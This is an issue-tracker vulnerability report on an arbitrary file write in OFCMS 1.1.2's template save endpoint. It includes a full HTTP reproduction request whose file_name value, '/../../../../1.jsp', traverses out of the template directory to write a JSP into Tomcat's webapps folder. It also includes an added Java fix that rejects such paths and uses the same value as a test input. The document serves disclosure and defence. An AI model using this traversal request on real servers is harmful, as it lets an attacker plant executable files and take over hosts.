OFCMS 1.1.2 has an arbitrary file write vulnerability

Status: To do
Created: 2024-09-20 15:46

Vulnerability product: ofcms
Vulnerability version: 1.1.2
Source code link: https://gitee.com/oufu/ofcms/releases/download/V1.1.2/ofcms-admin.war
Vulnerability type: Arbitrary file write
Vulnerability details:
The save method in ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java does not process the value of the received file_name parameter. The value is passed directly to new FileOutputStream in the writeString method of ofcms-admin\src\main\java\com\ofsoft\cms\core\uitle\FileUtils.java for reading and writing.

Code audit process:
The file ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java does not process the incoming file_name parameter.
The value is then passed directly to new FileOutputStream.

Vulnerability reproduction:
Prerequisite: backend administrator privileges.

POST /ofcms-admin/admin/cms/template/save.json HTTP/1.1
Host: 192.168.74.150:8080
Content-Length: 46
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.74.150:8080
Referer: http://192.168.74.150:8080/ofcms-admin/admin/f.html?p=system/log/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BE6318C477E70A8CE8C82EB63282452D
Connection: close

file_name=/../../../../1.jsp&file_content=test

The JSP file has been written into the webapps directory of Tomcat
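
One way to close the gap described in this report, as an added example that is not part of the original issue or the OFCMS code base: resolve file_name against the template directory and refuse anything that normalizes outside it. The class name SafeTemplatePath, the resolve helper, the .html allowlist and the temporary base directory are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Added example: hypothetical helper, not part of the OFCMS code base.
public class SafeTemplatePath {

    /** Resolves a user-supplied file_name under baseDir, or throws if it would escape it. */
    static Path resolve(Path baseDir, String fileName) throws IOException {
        if (fileName == null || fileName.isEmpty() || fileName.indexOf('\0') >= 0) {
            throw new SecurityException("empty or malformed file_name");
        }
        // Assumption: templates are only ever .html files; anything else (e.g. .jsp) is refused.
        if (!fileName.toLowerCase(java.util.Locale.ROOT).endsWith(".html")) {
            throw new SecurityException("extension not allowed: " + fileName);
        }
        Path base = baseDir.toRealPath();
        // Strip leading separators so the value is always treated as relative to base.
        String relative = fileName.replace('\\', '/').replaceFirst("^/+", "");
        Path candidate = base.resolve(relative).normalize();
        if (!candidate.startsWith(base)) {
            throw new SecurityException("path escapes template directory: " + fileName);
        }
        // Symlink check: the nearest existing ancestor must also resolve under base.
        Path existing = candidate;
        while (!Files.exists(existing)) {
            existing = existing.getParent();
        }
        if (!existing.toRealPath().startsWith(base)) {
            throw new SecurityException("symlink escapes template directory: " + fileName);
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("templates"); // constructed sample directory
        // Constructed inputs: one legitimate name, the value from the report, and two variants.
        String[] samples = { "default/index.html", "/../../../../1.jsp",
                             "/../../../../1.html", "a/../../b.html" };
        for (String s : samples) {
            try {
                System.out.println("OK      " + s + " -> " + resolve(base, s));
            } catch (SecurityException e) {
                System.out.println("REFUSED " + s + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The containment check is done on the normalized path rather than by searching the string for "..", so it also covers absolute paths and mixed separators.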

王傑 created the task 6 months ago